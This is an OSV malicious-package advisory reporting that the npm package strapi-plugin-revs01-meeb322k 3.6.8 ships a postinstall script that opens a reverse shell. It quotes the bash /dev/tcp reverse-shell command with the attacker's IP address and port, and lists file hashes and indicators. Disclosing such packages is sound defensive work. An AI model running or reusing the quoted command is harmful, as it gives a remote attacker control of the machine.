MAL-2026-16185

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-revs01-meeb322k/MAL-2026-16185.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16185
Published
2026-09-15T15:53:46Z
Modified
2026-09-15T16:31:26Z
Summary
Malicious code in strapi-plugin-revs01-meeb322k (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (981b426b3809283ad517caf0032d403db2c479faa3c717620151cbfabcc9b81c)

strapi-plugin-revs01-meeb322k@3.6.8 ships a postinstall lifecycle script (scripts.postinstall = node postinstall.js) that spawns /bin/bash via child_process.exec and runs bash -i > /dev/tcp/14.225.210.85/443 0>&1, opening an interactive reverse shell from the installer's host to 14.225.210.85 on TCP/443. The script also drops a marker file under /tmp. The behavior triggers automatically on npm install, granting full remote code execution on the installing developer or CI machine. The package self-describes as a reverse shell payload for Strapi.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020053",
            "import_time": "2026-09-15T16:19:14.558148397Z",
            "modified_time": "2026-09-15T15:53:46Z",
            "sha256": "981b426b3809283ad517caf0032d403db2c479faa3c717620151cbfabcc9b81c",
            "source": "amazon-inspector",
            "versions": [
                "3.6.8"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / strapi-plugin-revs01-meeb322k

Package

Name
strapi-plugin-revs01-meeb322k
View open source insights on deps.dev
Purl
pkg:npm/strapi-plugin-revs01-meeb322k

Affected ranges

Affected versions

3.*
3.6.8

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "dfa7478eb73161feed4ab606f488ee08eda7efe631fb5fc3b1a78367d4f52ad4",
            "tlsh": "ae11cb4166f9673562338ddde60b942ba3474e05703ae517b98c03171ec6c8cc5426fd"
        }
    ],
    "package_integrity": [
        {
            "filename": "strapi-plugin-revs01-meeb322k-3.6.8.tgz",
            "hashes": {
                "sha1": "6c539f4a50590714ebe2965f41c9f66ed2f80721",
                "sha512_sri": "sha512-H/61y3ox+mBGH4LuSFnbQUPo0lRMuxoC6yJiSODC1cAcDdwxA0hLr7SHpOtJVa5t4pLfaL1PpmUDZ7q187rfdQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-revs01-meeb322k/MAL-2026-16185.json"